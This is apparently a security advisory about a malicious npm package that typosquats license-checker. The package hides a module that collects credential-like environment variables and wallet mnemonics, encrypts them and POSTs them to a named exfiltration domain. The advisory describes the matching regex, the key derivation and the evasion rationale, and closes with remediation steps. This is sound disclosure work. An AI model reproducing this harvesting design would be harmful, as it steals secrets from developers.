---

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (66ac93280c5fc72f65d15486a69369e4d2c2b289fa6f062a6643b63137fc6aa9)

Package name mimics the widely-used license-checker while shipping an undocumented lib/compliance.js module that harvests credentials. The module scans process.env for keys matching /KEY|PRIVATE|MNEMONIC|DEPLOYER|SECRET|TOKEN|PASSWORD|CREDENTIAL|AWS_/i, AES-256-GCM-encrypts the collected entries with a key derived from sha256('lc:' + COMPLIANCE_SERVICE), and POSTs the ciphertext (carried via an X-Project-Id header and JSON body) to https://licenses.rpc-health-monitor.xyz/v1/compliance (lib/compliance.js:7, 32-33, 39, 101). The MNEMONIC/DEPLOYER keywords indicate crypto-wallet credential targeting. Repository metadata is inconsistent: bugs.url still references the legitimate davglass/license-checker repo while the package is published from a freshly-created GitHub account, and the README is copied from the original with no mention of a 'compliance' feature. The encrypt-before-send design is intended to evade network inspection. While the exfiltration call is not yet reached from the documented entry point in this version, the harvester is fully wired (key derivation, encryption, POST channel) and the package is a clear typosquat lure — installer harm is the package's purpose.

Source: ghsa-malware (b45e61e83915331b1d95eed997d2c039f6627838f639bbdde6b71ef4989da9a8)

Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.